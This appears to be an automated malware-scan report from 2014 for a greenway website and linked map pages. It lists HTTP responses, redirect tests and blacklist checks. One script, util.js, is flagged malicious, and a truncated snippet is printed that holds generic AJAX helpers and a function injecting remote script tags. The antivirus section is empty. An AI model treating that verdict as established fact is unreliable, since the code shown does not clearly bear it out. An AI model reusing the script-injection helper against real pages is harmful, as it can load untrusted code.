Scanned pages/files
| Request | Server response | Status |
http://greenwaysoakridge.org/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 23 Apr 2014 05:55:11 GMT Location: http://domainpark.sitelutions.com/sitelutions_temp_down.html Server: nginx/1.4.1 Content-Length: 160 Content-Type: text/html | clean |
http://domainpark.sitelutions.com/sitelutions_temp_down.html | 200 OK Content-Length: 4688 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21987 Content-Type: text/javascript | clean |
http://greenwaysoakridge.org/info/history | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 05:55:13 GMT Server: nginx/1.4.1 Content-Type: text/html; charset=iso-8859-1 | clean |
http://tnlandforms.us/greenways/history | 404 Not Found Content-Length: 2532 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://greenwaysoakridge.org/test404page.js | HTTP/1.1 200 OK Connection: close Date: Wed, 23 Apr 2014 05:55:14 GMT Server: nginx/1.4.1 Content-Type: text/html; charset=iso-8859-1 | clean |
http://tnlandforms.us/greenways/ | 200 OK Content-Length: 4896 Content-Type: text/html | clean |
http://tnlandforms.us/greenways/gway1.html | 200 OK Content-Length: 23035 Content-Type: text/html | clean |
http://tnlandforms.us/greenways/../google.php?trk=phase4 | 200 OK Content-Length: 25533 Content-Type: text/html | clean |
http://maps.google.com/maps/api/js?sensor=false | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://tnlandforms.us/greenways/../js3/gmutils.js | 200 OK Content-Length: 6741 Content-Type: text/javascript | clean |
http://tnlandforms.us/greenways/../js3/dist.js | 200 OK Content-Length: 7402 Content-Type: text/javascript | clean |
http://tnlandforms.us/greenways/../js3/util.js | 200 OK Content-Length: 2179 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function createXmlHttpRequest() { try { if (typeof ActiveXObject != 'undefined') { return new ActiveXObject('Microsoft.XMLHTTP'); } else if (window["XMLHttpRequest"]) { return new XMLHttpRequest(); } } catch (e) { changeStatus(e); } return null; }; function downloadUrl(url, callback) { var status = -1; var request = createXmlHttpRequest(); if (!request) { return false; } request.onreadystate var doc = new ActiveXObject('Microsoft.XMLDOM'); doc.loadXML(str); return doc; } if (typeof DOMParser != 'undefined') { return (new DOMParser()).parseFromString(str, 'text/xml'); } return createElement('div', null); } function downloadScript(url) { var script = document.createElement('script'); script.src = url; document.body.appendChild(script); } Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://mytopo.com/TileService/Scripts/trimble.mytopo.v3.js?partnerID=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 05:55:24 GMT Accept-Ranges: bytes ETag: "70763b557eace1:28a" Server: Microsoft-IIS/6.0 Content-Length: 7558 Content-Location: http://mytopo.com/TileService/Scripts/trimble.mytopo.v3.js?partnerID=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 Content-Type: application/x-javascript Last-Modified: Mon, 25 Nov 2013 17:54:05 GMT X-Powered-By: ASP.NET | clean |
http://mytopo.com/tileservice/scripts/trimble.mytopo.v3.js?partnerid=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 05:55:25 GMT Accept-Ranges: bytes ETag: "70763b557eace1:28a" Server: Microsoft-IIS/6.0 Content-Length: 7558 Content-Location: http://mytopo.com/tileservice/scripts/trimble.mytopo.v3.js?partnerid=12359&hash=20f54b9ac4bb8b10d66a514e2cf70919 Content-Type: application/x-javascript Last-Modified: Mon, 25 Nov 2013 17:54:05 GMT X-Powered-By: ASP.NET | clean |
http://mytopo.com/test404page.js | 200 OK Content-Length: 7647 Content-Type: text/html | clean |
http://mytopo.com//www.googleadservices.com/pagead/conversion.js/ | 200 OK Content-Length: 7647 Content-Type: text/html | clean |
http://mytopo.com/index.cfm | 200 OK Content-Length: 11015 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: greenwaysoakridge.org
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 23 Apr 2014 05:55:11 GMT
Location: http://domainpark.sitelutions.com/sitelutions_temp_down.html
Server: nginx/1.4.1
Content-Length: 160
Content-Type: text/html
...160 bytes of data.
GET / HTTP/1.1
Host: greenwaysoakridge.org
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Wed, 23 Apr 2014 05:55:11 GMT
Location: http://domainpark.sitelutions.com/sitelutions_temp_down.html
Server: nginx/1.4.1
Content-Length: 160
Content-Type: text/html
...160 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: greenwaysoakridge.org
Referer: http://www.google.com/search?q=greenwaysoakridge.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: greenwaysoakridge.org
Referer: http://www.google.com/search?q=greenwaysoakridge.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=greenwaysoakridge.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://greenwaysoakridge.org/
Result: greenwaysoakridge.org is not infected or malware details are not published yet.
Result: greenwaysoakridge.org is not infected or malware details are not published yet.